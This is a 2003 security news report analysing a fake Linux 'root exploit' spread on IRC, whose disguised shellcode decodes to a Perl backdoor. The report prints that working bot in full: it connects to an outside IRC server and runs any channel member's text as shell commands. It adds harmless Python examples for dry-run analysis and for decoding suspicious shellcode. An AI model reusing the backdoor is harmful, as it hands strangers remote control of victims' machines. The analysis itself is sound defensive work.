Rootsecure.net
The Security News Site For Systems Administrators & Hackers
Reports | Reverse command execution exploit via IRC analysis
{15th Jun 2003}
Back in May, Rootsecure.net reported how "hackers" were distributing code under the pretence that it was a remote exploit or similar, which in fact attacked the user who ran it, for example by adding a new root account or deleting files.

Since then a further, arguably more dangerous, so-called exploit has come to light. If it is run, it hands control of the host machine to anyone on an IRC channel. IRC was also the method used to distribute it, along with the message "new root exploit is out to slackware 9.1 and redhat 9.1! enjoy....be nice to your frinds boxes!" and a link to http://home.no/exploited/exploits/kmodaxx.c.

The link points to realistic-looking C source code along with a block of "shellcode". The shellcode, which the C program executes, is not machine code at all: it decodes to the following Perl script:

----
#!/usr/bin/perl

$chan="#darknet";
$nick="moron";
$server="efnet.vuurwerk.nl";

$SIG{TERM}={};
exit if fork;

use IO::Socket;

$sock = IO::Socket::INET->new($server.":6667")||exit;

print $sock "USER moron +i moron :moronv2\nNICK moron\n";

$i=1;

while(<$sock>=~/^[^ ]+ ([^ ]+) /){

    $mode=$1;
    last if $mode=="001";

    if($mode=="433"){
        $i++;
        $nick=~s/\d*$/$i/;
        print $sock "NICK $nick\n";
    }
}

print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";

while (<$sock>){

    if (/^PING (.*)$/){
        print $sock "PONG $1\nJOIN $chan\n";
    }

    if (s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
        s/\s*$//;
        $_=`$_`;

        foreach (split "\n") {
            print $sock "PRIVMSG $chan :$_\n";
            sleep 1;
        }
    }
}

#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
----

The Perl script forks into the background, connects to the IRC server "efnet.vuurwerk.nl" on port 6667, registers the nickname "moron" (appending a counter, giving "moron2", "moron3" and so on, whenever the server answers with a 433 nickname-in-use reply) and joins the channel "#darknet". From then on any channel member can type "moron: command": the bot runs the text after the colon through the shell with backticks and posts each line of output back into the channel, one line per second, answering server PINGs to stay connected. There is no password or origin check, so control of the compromised host belongs to whoever happens to be in the channel, not only to the person who distributed the file. On joining it announces itself with the message:

Hi, Im a moron that ran a fake 0day exploit. v2
to run commands on me, type: moron: command


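As an added example (not code from the original report, and not the bot itself), the following Python mirrors the bot's command dispatch so the trigger conditions can be checked without executing anything: the Perl match that turns a channel message into a shell command, the nickname-collision handling, and the PING reply. The IRC lines it runs over are constructed for the example, not captured traffic; the sender "kid!~k@example.invalid" is invented.

```python
import re

# Constants taken from the decoded script.
CHAN = "#darknet"
NICK = "moron"


def next_nick(nick: str, i: int) -> str:
    """Mirror of the 433 (nickname in use) handling, $nick =~ s/\\d*$/$i/:
    any trailing digits are replaced by the counter, so "moron" becomes
    "moron2", then "moron3", and so on.  count=1 matches Perl's s/// without /g."""
    return re.sub(r"\d*$", str(i), nick, count=1)


def command_pattern(chan: str = CHAN, nick: str = NICK):
    """Python equivalent of the Perl match
         ^[^ ]+ PRIVMSG $chan :$nick[^ :\\w]*:[^ :\\w]* (.*)$
    The sender prefix is only [^ ]+, i.e. any user in the channel is accepted."""
    return re.compile(r"^[^ ]+ PRIVMSG " + re.escape(chan) + " :" + re.escape(nick)
                      + r"[^ :\w]*:[^ :\w]* (.*)$")


def extract_command(line: str, chan: str = CHAN, nick: str = NICK):
    """Return the shell command the bot would run for one raw IRC line, or None."""
    m = command_pattern(chan, nick).match(line)
    if m is None:
        return None
    return m.group(1).rstrip()  # the Perl s/\s*$// strips the trailing CR


def classify(line: str, chan: str = CHAN, nick: str = NICK):
    """Dry run of the bot's main loop for one line: what it would send or execute."""
    m = re.match(r"^PING (.*)$", line)
    if m:
        # The bot answers every PING and re-JOINs the channel at the same time.
        return ("send", "PONG " + m.group(1).rstrip() + "\nJOIN " + chan)
    cmd = extract_command(line, chan, nick)
    if cmd is not None:
        return ("exec", cmd)  # the real script does $_ = `$_` here
    return ("ignore", None)


# Constructed IRC lines (not captured traffic) in the form a server delivers them.
SAMPLE_LINES = [
    ":kid!~k@example.invalid PRIVMSG #darknet :moron: id\r\n",
    ":kid!~k@example.invalid PRIVMSG #darknet :moron:ls -la /root\r\n",  # no space after colon
    ":kid!~k@example.invalid PRIVMSG #darknet :hey moron: id\r\n",       # nick not at start
    ":kid!~k@example.invalid PRIVMSG #other :moron: id\r\n",             # wrong channel
    ":kid!~k@example.invalid PRIVMSG #darknet :\x01VERSION\x01\r\n",     # CTCP VERSION
    "PING :efnet.vuurwerk.nl\r\n",
]


def triage(lines, chan: str = CHAN, nick: str = NICK):
    """Classify each line without executing anything."""
    return [classify(line, chan, nick) for line in lines]


if __name__ == "__main__":
    for line, (action, arg) in zip(SAMPLE_LINES, triage(SAMPLE_LINES)):
        print(f"{action:7}{arg!r:45} <- {line.rstrip()!r}")
```

Two details fall out of the dry run: the command must be addressed as "moron: " with a space after the colon (the pattern only allows punctuation, not word characters, between nick and command), and once the nick has been renamed after a collision the commands must use the new nick, which the bot tells the channel in its greeting.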
To discover whether anyone was actually in the channel and willing to take advantage of those who had run the "exploit", Rootsecure.net first ran a modified version of the script that simply connected and logged every message to the console, without executing anything. A number of commands were sent to the bot, including "ls" and a CTCP VERSION request, most likely to confirm that it was a script-driven bot and not someone on mIRC pretending to have run the code.

Since there was interest in the bot, a honeypot machine was set up running the original Perl script. By this time, however, attempts to join #darknet were being answered by the server with "Nick/channel is temporarily unavailable" (IRC reply 437, ERR_UNAVAILRESOURCE), which prevented anyone from joining.

Note: To decode the shellcode using Perl, open a new file, type $code=, paste in the shellcode adding a full stop (Perl's string concatenation operator) after each quoted line and a semicolon after the last; Perl's double-quoted strings understand the same \x escapes as C, so this rebuilds the original bytes. Then add $code =~ s/;/;\n/g; print $code; to the end of the file and execute it. The substitution only inserts a line break after each statement so that the decoded script is readable.
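The same decoding in Python, as an added example (it is neither the report's own Perl one-liner nor any part of kmodaxx.c): it pulls every char array initialised from adjacent string literals out of a C source, resolves the escapes to bytes, and reports whether the result is a "#!" script, readable text or opaque machine code. The C fragment is constructed for the example, and the array name shellcode is an assumption about how such files are laid out.

```python
import re

# Constructed C fragment in the style of a fake exploit that carries its payload as
# "shellcode"; it is NOT the contents of kmodaxx.c.  The bytes spell a three-line
# Perl script.
SAMPLE_C = r'''
#include <stdio.h>
char shellcode[] =
    "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a"
    "\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x0a"
    "\x70\x72\x69\x6e\x74\x20\x31\x3b\x0a";
int main(void) { printf("using shellcode of %d bytes\n", (int)sizeof shellcode); return 0; }
'''

SIMPLE_ESCAPES = {"n": 10, "t": 9, "r": 13, "a": 7, "b": 8, "f": 12, "v": 11,
                  "\\": 92, '"': 34, "'": 39, "?": 63}
# Body of one C string literal (between the quotes): plain chars or backslash escapes.
LITERAL = re.compile(r'"((?:[^"\\\n]|\\.)*)"')
# char NAME[] = "..." "..." ;   (adjacent literals are concatenated by the C compiler)
DECL = re.compile(r'\bchar\s+(\w+)\s*\[\s*\]\s*=\s*((?:\s*"(?:[^"\\\n]|\\.)*")+)\s*;')


def c_unescape(body: str) -> bytes:
    """Resolve C escapes (\\xHH, octal, \\n, ...) in one literal body to raw bytes.
    \\x is read as two hex digits, the form shellcode listings use."""
    out = bytearray()
    i = 0
    while i < len(body):
        c = body[i]
        if c != "\\":
            out += c.encode("latin-1")
            i += 1
            continue
        e = body[i + 1]
        if e == "x":
            m = re.match(r"[0-9a-fA-F]{1,2}", body[i + 2:])
            if not m:
                raise ValueError("\\x without hex digits")
            out.append(int(m.group(0), 16))
            i += 2 + len(m.group(0))
        elif e in "01234567":
            m = re.match(r"[0-7]{1,3}", body[i + 1:])
            out.append(int(m.group(0), 8) & 0xFF)
            i += 1 + len(m.group(0))
        elif e in SIMPLE_ESCAPES:
            out.append(SIMPLE_ESCAPES[e])
            i += 2
        else:
            raise ValueError(f"unsupported escape \\{e}")
    return bytes(out)


def extract_arrays(src: str) -> dict:
    """Return {name: bytes} for every  char name[] = "..." ;  declaration in C source."""
    return {m.group(1): b"".join(c_unescape(b) for b in LITERAL.findall(m.group(2)))
            for m in DECL.finditer(src)}


def describe(blob: bytes) -> tuple:
    """Is the decoded blob a '#!' script, readable text, or opaque machine code?"""
    if blob.startswith(b"#!"):
        first = blob[2:].split(b"\n", 1)[0].split()
        return ("script", first[0].decode("ascii", "replace") if first else "")
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in blob)
    if blob and printable / len(blob) > 0.9:
        return ("text", "")
    return ("binary", "")


if __name__ == "__main__":
    for name, blob in extract_arrays(SAMPLE_C).items():
        kind, detail = describe(blob)
        print(f"{name}: {len(blob)} bytes, {kind} {detail}")
        if kind != "binary":
            print(blob.decode("latin-1"))
```

Genuine shellcode comes out as "binary" and has to be disassembled; a "shellcode" block that decodes to a script beginning with #!/usr/bin/perl is the tell-tale of the fake exploits this report describes, and is worth checking before the C file is ever compiled.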
 

Related Links:

Hackers Hack 'Script Kiddies', Rootsecure.net
-1 day exploit - Warning, Full Disclosure